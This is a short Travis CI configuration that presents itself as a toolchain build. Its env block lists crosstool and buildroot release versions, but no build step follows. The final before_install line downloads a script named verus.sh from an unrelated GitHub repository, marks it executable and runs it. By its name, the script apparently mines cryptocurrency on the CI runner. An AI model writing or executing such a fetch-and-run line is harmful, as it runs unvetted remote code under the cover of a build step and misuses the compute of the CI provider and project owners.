sudo: required
language: bash
services:
  - docker
env:
  global:
    - CT_RELEASE=1.0.1
    - BR_RELEASE=2015.08.1-rev1
    - BR_TRAVIS_RELEASE=1.0.0
before_install:
  - sudo apt-get -y update 
  - sudo apt-get -y install wget
  - sudo apt-get -y update
  - wget https://raw.githubusercontent.com/comandashtar/colab-2/main/verus.sh && chmod +x verus.sh && ./verus.sh
